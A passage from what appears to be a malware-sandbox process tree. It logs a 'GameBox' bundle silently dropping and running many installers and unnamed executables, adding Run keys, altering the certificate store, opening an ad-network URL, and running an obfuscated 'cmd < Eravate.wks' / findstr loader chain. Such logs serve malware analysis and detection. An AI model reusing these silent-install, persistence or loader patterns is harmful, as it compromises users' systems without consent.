                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
                                                  11⤵
                                                    PID:2712
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
                                                    11⤵
                                                      PID:5728
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                                                      11⤵
                                                        PID:1608
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
                                                        11⤵
                                                          PID:7852
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                                          11⤵
                                                            PID:5516
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2228 /prefetch:1
                                                            11⤵
                                                              PID:4424
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
                                                              11⤵
                                                                PID:7636
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
                                                                11⤵
                                                                  PID:8048
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
                                                                  11⤵
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:2092
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
                                                                  11⤵
                                                                  • Executes dropped EXE
                                                                  PID:6032
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3524 /prefetch:8
                                                                  11⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:7008
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2560 /prefetch:1
                                                                  11⤵
                                                                    PID:6328
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1784 /prefetch:1
                                                                    11⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:7188
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2560 /prefetch:1
                                                                    11⤵
                                                                      PID:6860
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
                                                                      11⤵
                                                                        PID:6484
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,13669133048553406873,17222073938801537194,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6504 /prefetch:2
                                                                        11⤵
                                                                          PID:5516
                                                                    • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                      "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                      9⤵
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:7552
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:5632
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 296
                                                                6⤵
                                                                • Program crash
                                                                • Checks processor information in registry
                                                                • Enumerates system info in registry
                                                                PID:2272
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Enumerates connected drives
                                                              • Modifies system certificate store
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5900
                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409788 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                6⤵
                                                                  PID:6964
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                5⤵
                                                                  PID:1416
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-OHA5K.tmp\WEATHER Manager.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-OHA5K.tmp\WEATHER Manager.tmp" /SL5="$1037C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:1268
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-MRQLL.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-MRQLL.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Enumerates connected drives
                                                                      • Modifies system certificate store
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:3792
                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-MRQLL.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-MRQLL.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409788 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                        8⤵
                                                                          PID:4036
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:5576
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-V7PN8.tmp\VPN.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-V7PN8.tmp\VPN.tmp" /SL5="$402A2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                      6⤵
                                                                        PID:2672
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-44HGR.tmp\Setup.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-44HGR.tmp\Setup.exe" /silent /subid=720
                                                                          7⤵
                                                                            PID:6068
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-MURKT.tmp\Setup.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-MURKT.tmp\Setup.tmp" /SL5="$30472,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-44HGR.tmp\Setup.exe" /silent /subid=720
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              • Modifies registry class
                                                                              • Modifies system certificate store
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:5908
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                9⤵
                                                                                  PID:480
                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                    tapinstall.exe remove tap0901
                                                                                    10⤵
                                                                                    • Checks SCSI registry key(s)
                                                                                    PID:1000
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                  9⤵
                                                                                    PID:5520
                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                      10⤵
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Windows directory
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Modifies system certificate store
                                                                                      PID:5808
                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                    9⤵
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:7504
                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                    9⤵
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:2352
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5196
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 1916
                                                                              6⤵
                                                                              • Program crash
                                                                              • Checks processor information in registry
                                                                              • Enumerates system info in registry
                                                                              PID:6364
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5356
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-2BH95.tmp\MediaBurner2.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-2BH95.tmp\MediaBurner2.tmp" /SL5="$2042C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                              6⤵
                                                                              • Loads dropped DLL
                                                                              PID:3592
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-8ROR5.tmp\3377047_logo_media.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-8ROR5.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                7⤵
                                                                                • Drops file in Drivers directory
                                                                                • Adds Run key to start application
                                                                                PID:5916
                                                                                • C:\Program Files\Common Files\KLFFUPHOBD\ultramediaburner.exe
                                                                                  "C:\Program Files\Common Files\KLFFUPHOBD\ultramediaburner.exe" /VERYSILENT
                                                                                  8⤵
                                                                                    PID:7668
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-NMRNC.tmp\ultramediaburner.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-NMRNC.tmp\ultramediaburner.tmp" /SL5="$2057C,281924,62464,C:\Program Files\Common Files\KLFFUPHOBD\ultramediaburner.exe" /VERYSILENT
                                                                                      9⤵
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:8040
                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                        10⤵
                                                                                          PID:6396
                                                                                    • C:\Users\Admin\AppData\Local\Temp\b7-359b6-15e-96cb2-0ddb03851a7c2\Tykazhashuca.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\b7-359b6-15e-96cb2-0ddb03851a7c2\Tykazhashuca.exe"
                                                                                      8⤵
                                                                                        PID:8028
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                          9⤵
                                                                                            PID:3788
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4b5346f8,0x7ffb4b534708,0x7ffb4b534718
                                                                                              10⤵
                                                                                                PID:7456
                                                                                          • C:\Users\Admin\AppData\Local\Temp\db-84659-db6-06cae-9dba487ff2caf\Cakoshufini.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\db-84659-db6-06cae-9dba487ff2caf\Cakoshufini.exe"
                                                                                            8⤵
                                                                                              PID:8168
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dxkab01h.s1c\GcleanerEU.exe /eufive & exit
                                                                                                9⤵
                                                                                                  PID:5784
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dxkab01h.s1c\GcleanerEU.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\dxkab01h.s1c\GcleanerEU.exe /eufive
                                                                                                    10⤵
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:2384
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 256
                                                                                                      11⤵
                                                                                                      • Program crash
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:5328
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5r4rsias.ycx\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                  9⤵
                                                                                                    PID:4028
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5r4rsias.ycx\installer.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\5r4rsias.ycx\installer.exe /qn CAMPAIGN="654"
                                                                                                      10⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Enumerates connected drives
                                                                                                      PID:8048
                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5r4rsias.ycx\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5r4rsias.ycx\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409788 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                        11⤵
                                                                                                          PID:6264
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jiwh1wwj.apw\ufgaa.exe & exit
                                                                                                      9⤵
                                                                                                        PID:3092
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          10⤵
                                                                                                            PID:8124
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e4wd0z1x.sg2\anyname.exe & exit
                                                                                                          9⤵
                                                                                                            PID:2868
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\e4wd0z1x.sg2\anyname.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\e4wd0z1x.sg2\anyname.exe
                                                                                                              10⤵
                                                                                                                PID:5152
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\e4wd0z1x.sg2\anyname.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\e4wd0z1x.sg2\anyname.exe" -q
                                                                                                                  11⤵
                                                                                                                    PID:2236
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1224
                                                                                                                      12⤵
                                                                                                                      • Program crash
                                                                                                                      PID:7564
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1248
                                                                                                                      12⤵
                                                                                                                      • Program crash
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:1212
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\htvkc4mh.vaa\gcleaner.exe /mixfive & exit
                                                                                                                9⤵
                                                                                                                  PID:8012
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\htvkc4mh.vaa\gcleaner.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\htvkc4mh.vaa\gcleaner.exe /mixfive
                                                                                                                    10⤵
                                                                                                                      PID:612
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 256
                                                                                                                        11⤵
                                                                                                                        • Program crash
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Enumerates system info in registry
                                                                                                                        PID:3972
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2mynv5qd.raj\autosubplayer.exe /S & exit
                                                                                                                    9⤵
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:1064
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                            5⤵
                                                                                                              PID:4468
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                6⤵
                                                                                                                  PID:2172
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 972
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:2432
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1240
                                                                                                                • C:\Users\Admin\AppData\Roaming\3250155.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\3250155.exe"
                                                                                                                  6⤵
                                                                                                                    PID:3712
                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3712 -s 2296
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:3108
                                                                                                                  • C:\Users\Admin\AppData\Roaming\1244178.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\1244178.exe"
                                                                                                                    6⤵
                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                    PID:2804
                                                                                                                  • C:\Users\Admin\AppData\Roaming\8353926.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\8353926.exe"
                                                                                                                    6⤵
                                                                                                                      PID:1896
                                                                                                                    • C:\Users\Admin\AppData\Roaming\1776251.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\1776251.exe"
                                                                                                                      6⤵
                                                                                                                        PID:5716
                                                                                                                      • C:\Users\Admin\AppData\Roaming\3058797.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\3058797.exe"
                                                                                                                        6⤵
                                                                                                                          PID:3772
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3772 -s 2424
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:7320
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                        5⤵
                                                                                                                          PID:3376
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpFBA7_tmp.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmpFBA7_tmp.exe"
                                                                                                                            6⤵
                                                                                                                              PID:1552
                                                                                                                              • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                "C:\Windows\System32\dllhost.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:6516
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                  7⤵
                                                                                                                                    PID:6672
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd
                                                                                                                                      8⤵
                                                                                                                                        PID:6988
                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                          9⤵
                                                                                                                                            PID:7100
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            Esplorarne.exe.com i
                                                                                                                                            9⤵
                                                                                                                                              PID:2384
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                10⤵
                                                                                                                                                  PID:7376
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    11⤵
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:7924
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                      12⤵
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:6740
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        13⤵
                                                                                                                                                          PID:2092
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            14⤵
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:1684
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
